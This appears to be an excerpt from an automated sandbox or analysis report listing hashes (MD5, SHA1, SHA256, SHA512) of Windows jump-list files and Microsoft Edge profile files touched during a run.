C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | fc04a623dc2aa1fd3b7086e05665d9ce |
| SHA1 | 37a1c87826b680eace99ac6783a9f56bdfac8f5d |
| SHA256 | 772655d6c7b904d881afdd70b97a3e042948561c95965d4641efeaaaec29efcf |
| SHA512 | a7ab1c966a52d9772700ff65fdf6581f36392e85226c3237ea70180acccf070b773e3a34836405ea8852bc4443b774b3c4729b20d71badad20f9938b24f845d7 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 3bfe3e51f762678e5aec09441f6859b8 |
| SHA1 | 5577330b11024f6daad4f739b694c4cfc8eb77be |
| SHA256 | 9589cf05f905765e8ffa168545a87f15c0da08a1ea6e61874a9721e11de6585c |
| SHA512 | d1a9d969c8031a3269369d5477395be1482592a7a5900a8f87d812356cbf7e222764bd0189bfcc82adef0c99026689124194625f4888f38da245797a063e3d88 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c5d6b6fd9ef0afeabd9f4d171c439758 |
| SHA1 | 306694982ccd797ba062ee0b0d68576532f99f27 |
| SHA256 | e0d9ad884ee824a40bf3ec34ea84728a66dbc1ba2f2a11b1ffeaf28ae2154429 |
| SHA512 | e746da733784e0580bd5063c3cbc4d623dfe3b8db8fd11bfdcef3bc12d6d5011b8a78600e685f220ed14c7b7c14bb63f3530eeab2e53a93451ca8d384a551c24 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 53e38d261d80b99a7f9f4580f3128392 |
| SHA1 | a33cf905978d3708fac9fc42cd322a92388fdb64 |
| SHA256 | 529b1fe4b3140f9d632a874168f21e10692235dac94e6ed5926dc8757ed130ef |
| SHA512 | 904aeaa51d6f6d40d65dc4a5a61252bb2209b58d320d002a6dac19bdf566c99cc2425fe787abd69cdadc4ecbf537f5d29b1afdbc2399c2947c24c84696130849 |